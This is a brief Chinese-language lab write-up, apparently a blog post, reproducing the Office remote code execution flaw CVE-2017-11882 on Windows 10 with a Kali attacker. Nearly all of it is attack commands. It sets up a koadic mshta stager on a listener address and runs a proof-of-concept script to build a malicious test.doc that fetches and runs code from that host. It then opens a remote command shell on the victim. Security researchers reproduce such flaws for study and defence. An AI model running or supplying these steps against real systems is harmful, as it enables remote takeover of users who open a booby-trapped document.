【研究】CVE-2017-11882-Office远程代码执行漏洞复现
实验环境:win10+kali
工具:koadic,Command43b_CVE-2017-11882.py
KALI:
root@kali:/opt/koadic-master# ./koadic
(koadic: stager/js/mshta)# set lhost 10.73.28.148
(koadic: stager/js/mshta)# set lport 55555
(koadic: stager/js/mshta)# run
python C:\Users\esafenet\Desktop\Command43b_CVE-2017-11882.py -c "mshta http://10.73.28.148:55555/Vr745" -o test.doc
win10上打开test.doc
(koadic: stager/js/mshta)# zombies 0
(koadic: stager/js/mshta)# cmdshell 0
浙公网安备 33010602011771号